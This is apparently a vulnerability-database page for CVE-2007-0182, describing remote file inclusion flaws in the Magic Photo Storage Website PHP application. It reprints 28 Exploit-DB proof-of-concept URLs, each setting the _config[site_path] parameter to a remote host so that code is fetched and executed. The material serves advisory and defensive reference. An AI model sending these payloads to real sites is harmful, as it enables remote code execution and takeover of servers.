CVE-2007-0182
published 2007-01-12CVE-2007-0182: Multiple PHP remote file inclusion vulnerabilities in magic photo storage website allow remote attackers to execute arbitrary PHP code via a URL in the…
PriorityP344high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
4.55%
90.4th percentile
Multiple PHP remote file inclusion vulnerabilities in magic photo storage website allow remote attackers to execute arbitrary PHP code via a URL in the _config[site_path] parameter to (1) admin_password.php, (2) add_welcome_text.php, (3) admin_email.php, (4) add_templates.php, (5) admin_paypal_email.php, (6) approve_member.php, (7) delete_member.php, (8) index.php, (9) list_members.php, (10) membership_pricing.php, or (11) send_email.php in admin/; (12) config.php or (13) db_config.php in include/; or (14) add_category.php, (15) add_news.php, (16) change_catalog_template.php, (17) couple_milestone.php, (18) couple_profile.php, (19) delete_category.php, (20) index.php, (21) login.php, (22) logout.php, (23) register.php, (24) upload_photo.php, (25) user_catelog_password.php, (26) user_email.php, (27) user_extend.php, or (28) user_membership_password.php in user/. NOTE: the include/common_function.php vector is already covered by another candidate from the same date.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Magic Photo Storage Website - '/user/login.php?_config[site_path]' Remote File Inclusion
exploitdb·2007-01-09
CVE-2007-0182 Magic Photo Storage Website - '/user/login.php?_config[site_path]' Remote File Inclusion
Magic Photo Storage Website - '/user/login.php?_config[site_path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/21965/info
Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/path/user/login.php?_config[site_path]=http://www.example2.com
Exploit-DB
Magic Photo Storage Website - '/user/add_news.php?_config[site_path]' Remote File Inclusion
exploitdb·2007-01-09
CVE-2007-0182 Magic Photo Storage Website - '/user/add_news.php?_config[site_path]' Remote File Inclusion
Magic Photo Storage Website - '/user/add_news.php?_config[site_path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/21965/info
Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/path/user/add_news.php?_config[site_path]=http://www.example2.com
Exploit-DB
Magic Photo Storage Website - '/admin/index.php?_config[site_path]' Remote File Inclusion
exploitdb·2007-01-09
CVE-2007-0182 Magic Photo Storage Website - '/admin/index.php?_config[site_path]' Remote File Inclusion
Magic Photo Storage Website - '/admin/index.php?_config[site_path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/21965/info
Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/path/admin/index.php?_config[site_path]=http://www.example2.com
Exploit-DB
Magic Photo Storage Website - '/admin/admin_email.php?_config[site_path]' Remote File Inclusion
exploitdb·2007-01-09
CVE-2007-0182 Magic Photo Storage Website - '/admin/admin_email.php?_config[site_path]' Remote File Inclusion
Magic Photo Storage Website - '/admin/admin_email.php?_config[site_path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/21965/info
Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/path/admin/admin_email.php?_config[site_path]=http://www.example2.com
Exploit-DB
Magic Photo Storage Website - '/user/register.php?_config[site_path]' Remote File Inclusion
exploitdb·2007-01-09
CVE-2007-0182 Magic Photo Storage Website - '/user/register.php?_config[site_path]' Remote File Inclusion
Magic Photo Storage Website - '/user/register.php?_config[site_path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/21965/info
Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/path/user/register.php?_config[site_path]=http://www.example2.com
Exploit-DB
Magic Photo Storage Website - '/user/logout.php?_config[site_path]' Remote File Inclusion
exploitdb·2007-01-09
CVE-2007-0182 Magic Photo Storage Website - '/user/logout.php?_config[site_path]' Remote File Inclusion
Magic Photo Storage Website - '/user/logout.php?_config[site_path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/21965/info
Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/path/user/logout.php?_config[site_path]=http://www.example2.com
Exploit-DB
Magic Photo Storage Website - '/admin/list_members.php?_config[site_path]' Remote File Inclusion
exploitdb·2007-01-09
CVE-2007-0182 Magic Photo Storage Website - '/admin/list_members.php?_config[site_path]' Remote File Inclusion
Magic Photo Storage Website - '/admin/list_members.php?_config[site_path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/21965/info
Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/path/admin/list_members.php?_config[site_path]=http://www.example2.com
Exploit-DB
Magic Photo Storage Website - '/user/couple_milestone.php?_config[site_path]' Remote File Inclusion
exploitdb·2007-01-09
CVE-2007-0182 Magic Photo Storage Website - '/user/couple_milestone.php?_config[site_path]' Remote File Inclusion
Magic Photo Storage Website - '/user/couple_milestone.php?_config[site_path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/21965/info
Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/path/user/couple_milestone.php?_config[site_path]=http://www.example2.com
Exploit-DB
Magic Photo Storage Website - '/user/change_catalog_template.php?_config[site_path]' Remote File Inclusion
exploitdb·2007-01-09
CVE-2007-0182 Magic Photo Storage Website - '/user/change_catalog_template.php?_config[site_path]' Remote File Inclusion
Magic Photo Storage Website - '/user/change_catalog_template.php?_config[site_path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/21965/info
Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/path/user/change_catalog_template.php?_config[site_path]=http://www.example2.com
Exploit-DB
Magic Photo Storage Website - '/user/index.php?_config[site_path]' Remote File Inclusion
exploitdb·2007-01-09
CVE-2007-0182 Magic Photo Storage Website - '/user/index.php?_config[site_path]' Remote File Inclusion
Magic Photo Storage Website - '/user/index.php?_config[site_path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/21965/info
Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/path/user/index.php?_config[site_path]=http://www.example2.com
Exploit-DB
Magic Photo Storage Website - '/include/config.php?_config[site_path]' Remote File Inclusion
exploitdb·2007-01-09
CVE-2007-0182 Magic Photo Storage Website - '/include/config.php?_config[site_path]' Remote File Inclusion
Magic Photo Storage Website - '/include/config.php?_config[site_path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/21965/info
Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/path/include/config.php?_config[site_path]=http://www.example2.com
Exploit-DB
Magic Photo Storage Website - '/admin/admin_password.php?_config[site_path]' Remote File Inclusion
exploitdb·2007-01-09
CVE-2007-0182 Magic Photo Storage Website - '/admin/admin_password.php?_config[site_path]' Remote File Inclusion
Magic Photo Storage Website - '/admin/admin_password.php?_config[site_path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/21965/info
Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/path/admin/admin_password.php?_config[site_path]=http://www.example2.com
Exploit-DB
Magic Photo Storage Website - '/user/user_catelog_password.php?_config[site_path]' Remote File Inclusion
exploitdb·2007-01-09
CVE-2007-0182 Magic Photo Storage Website - '/user/user_catelog_password.php?_config[site_path]' Remote File Inclusion
Magic Photo Storage Website - '/user/user_catelog_password.php?_config[site_path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/21965/info
Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/path/user/user_catelog_password.php?_config[site_path]=http://www.example2.com
Exploit-DB
Magic Photo Storage Website - '/user/couple_profile.php?_config[site_path]' Remote File Inclusion
exploitdb·2007-01-09
CVE-2007-0182 Magic Photo Storage Website - '/user/couple_profile.php?_config[site_path]' Remote File Inclusion
Magic Photo Storage Website - '/user/couple_profile.php?_config[site_path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/21965/info
Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/path/user/couple_profile.php?_config[site_path]=http://www.example2.com
Exploit-DB
Magic Photo Storage Website - '/admin/admin_paypal_email.php?_config[site_path]' Remote File Inclusion
exploitdb·2007-01-09
CVE-2007-0182 Magic Photo Storage Website - '/admin/admin_paypal_email.php?_config[site_path]' Remote File Inclusion
Magic Photo Storage Website - '/admin/admin_paypal_email.php?_config[site_path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/21965/info
Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/path/admin/admin_paypal_email.php?_config[site_path]=http://www.example2.com
Exploit-DB
Magic Photo Storage Website - '/user/delete_category.php?_config[site_path]' Remote File Inclusion
exploitdb·2007-01-09
CVE-2007-0182 Magic Photo Storage Website - '/user/delete_category.php?_config[site_path]' Remote File Inclusion
Magic Photo Storage Website - '/user/delete_category.php?_config[site_path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/21965/info
Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/path/user/delete_category.php?_config[site_path]=http://www.example2.com
Exploit-DB
Magic Photo Storage Website - '/user/upload_photo.php?_config[site_path]' Remote File Inclusion
exploitdb·2007-01-09
CVE-2007-0182 Magic Photo Storage Website - '/user/upload_photo.php?_config[site_path]' Remote File Inclusion
Magic Photo Storage Website - '/user/upload_photo.php?_config[site_path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/21965/info
Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/path/user/upload_photo.php?_config[site_path]=http://www.example2.com
Exploit-DB
Magic Photo Storage Website - '/user/add_category.php?_config[site_path]' Remote File Inclusion
exploitdb·2007-01-09
CVE-2007-0182 Magic Photo Storage Website - '/user/add_category.php?_config[site_path]' Remote File Inclusion
Magic Photo Storage Website - '/user/add_category.php?_config[site_path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/21965/info
Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/path/user/add_category.php?_config[site_path]=http://www.example2.com
Exploit-DB
Magic Photo Storage Website - '/user/user_extend.php?_config[site_path]' Remote File Inclusion
exploitdb·2007-01-09
CVE-2007-0182 Magic Photo Storage Website - '/user/user_extend.php?_config[site_path]' Remote File Inclusion
Magic Photo Storage Website - '/user/user_extend.php?_config[site_path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/21965/info
Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/path/user/user_extend.php?_config[site_path]=http://www.example2.com
Exploit-DB
Magic Photo Storage Website - '/admin/delete_member.php?_config[site_path]' Remote File Inclusion
exploitdb·2007-01-09
CVE-2007-0182 Magic Photo Storage Website - '/admin/delete_member.php?_config[site_path]' Remote File Inclusion
Magic Photo Storage Website - '/admin/delete_member.php?_config[site_path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/21965/info
Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/path/admin/delete_member.php?_config[site_path]=http://www.example2.com
Exploit-DB
Magic Photo Storage Website - '/user/user_membership_password.php?_config[site_path]' Remote File Inclusion
exploitdb·2007-01-09
CVE-2007-0182 Magic Photo Storage Website - '/user/user_membership_password.php?_config[site_path]' Remote File Inclusion
Magic Photo Storage Website - '/user/user_membership_password.php?_config[site_path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/21965/info
Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/path/user/user_membership_password.php?_config[site_path]=http://www.example2.com
Exploit-DB
Magic Photo Storage Website - '/admin/approve_member.php?_config[site_path]' Remote File Inclusion
exploitdb·2007-01-09
CVE-2007-0182 Magic Photo Storage Website - '/admin/approve_member.php?_config[site_path]' Remote File Inclusion
Magic Photo Storage Website - '/admin/approve_member.php?_config[site_path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/21965/info
Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/path/admin/approve_member.php?_config[site_path]=http://www.example2.com
Exploit-DB
Magic Photo Storage Website - '/admin/send_email.php?_config[site_path]' Remote File Inclusion
exploitdb·2007-01-09
CVE-2007-0182 Magic Photo Storage Website - '/admin/send_email.php?_config[site_path]' Remote File Inclusion
Magic Photo Storage Website - '/admin/send_email.php?_config[site_path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/21965/info
Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/path/admin/send_email.php?_config[site_path]=http://www.example2.com
Exploit-DB
Magic Photo Storage Website - '/include/db_config.php?_config[site_path]' Remote File Inclusion
exploitdb·2007-01-09
CVE-2007-0182 Magic Photo Storage Website - '/include/db_config.php?_config[site_path]' Remote File Inclusion
Magic Photo Storage Website - '/include/db_config.php?_config[site_path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/21965/info
Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/path/include/db_config.php?_config[site_path]=http://www.example2.com
Exploit-DB
Magic Photo Storage Website - '/user/user_email.php?_config[site_path]' Remote File Inclusion
exploitdb·2007-01-09
CVE-2007-0182 Magic Photo Storage Website - '/user/user_email.php?_config[site_path]' Remote File Inclusion
Magic Photo Storage Website - '/user/user_email.php?_config[site_path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/21965/info
Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/path/user/user_email.php?_config[site_path]=http://www.example2.com
Exploit-DB
Magic Photo Storage Website - '/admin/add_templates.php?_config[site_path]' Remote File Inclusion
exploitdb·2007-01-09
CVE-2007-0182 Magic Photo Storage Website - '/admin/add_templates.php?_config[site_path]' Remote File Inclusion
Magic Photo Storage Website - '/admin/add_templates.php?_config[site_path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/21965/info
Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/path/admin/add_templates.php?_config[site_path]=http://www.example2.com
Exploit-DB
Magic Photo Storage Website - '/admin/add_welcome_text.php?_config[site_path]' Remote File Inclusion
exploitdb·2007-01-09
CVE-2007-0182 Magic Photo Storage Website - '/admin/add_welcome_text.php?_config[site_path]' Remote File Inclusion
Magic Photo Storage Website - '/admin/add_welcome_text.php?_config[site_path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/21965/info
Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/path/admin/add_welcome_text.php?_config[site_path]=http://www.example2.com
Exploit-DB
Magic Photo Storage Website - '/admin/membership_pricing.php?_config[site_path]' Remote File Inclusion
exploitdb·2007-01-09
CVE-2007-0182 Magic Photo Storage Website - '/admin/membership_pricing.php?_config[site_path]' Remote File Inclusion
Magic Photo Storage Website - '/admin/membership_pricing.php?_config[site_path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/21965/info
Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/path/admin/membership_pricing.php?_config[site_path]=http://www.example2.com
No writeups or analysis indexed.
http://securityreason.com/securityalert/2136http://www.osvdb.org/32668http://www.osvdb.org/33411http://www.osvdb.org/33412http://www.osvdb.org/33413http://www.osvdb.org/33414http://www.osvdb.org/33415http://www.osvdb.org/33416http://www.osvdb.org/33417http://www.osvdb.org/33418http://www.osvdb.org/33419http://www.osvdb.org/33420http://www.osvdb.org/33421http://www.osvdb.org/33422http://www.osvdb.org/33423http://www.osvdb.org/33425http://www.osvdb.org/33426http://www.osvdb.org/33427http://www.osvdb.org/33428http://www.osvdb.org/33429http://www.osvdb.org/33430http://www.osvdb.org/33431http://www.osvdb.org/33432http://www.osvdb.org/33433http://www.osvdb.org/33434http://www.osvdb.org/33435http://www.osvdb.org/33436http://www.osvdb.org/33437http://www.osvdb.org/33438http://www.osvdb.org/33439http://www.securityfocus.com/archive/1/456389/100/0/threadedhttp://www.securityfocus.com/bid/21965http://securityreason.com/securityalert/2136http://www.osvdb.org/32668http://www.osvdb.org/33411http://www.osvdb.org/33412http://www.osvdb.org/33413http://www.osvdb.org/33414http://www.osvdb.org/33415http://www.osvdb.org/33416http://www.osvdb.org/33417http://www.osvdb.org/33418http://www.osvdb.org/33419http://www.osvdb.org/33420http://www.osvdb.org/33421http://www.osvdb.org/33422http://www.osvdb.org/33423http://www.osvdb.org/33425http://www.osvdb.org/33426http://www.osvdb.org/33427http://www.osvdb.org/33428http://www.osvdb.org/33429http://www.osvdb.org/33430http://www.osvdb.org/33431http://www.osvdb.org/33432http://www.osvdb.org/33433http://www.osvdb.org/33434http://www.osvdb.org/33435http://www.osvdb.org/33436http://www.osvdb.org/33437http://www.osvdb.org/33438http://www.osvdb.org/33439http://www.securityfocus.com/archive/1/456389/100/0/threadedhttp://www.securityfocus.com/bid/21965
2007-01-12
Published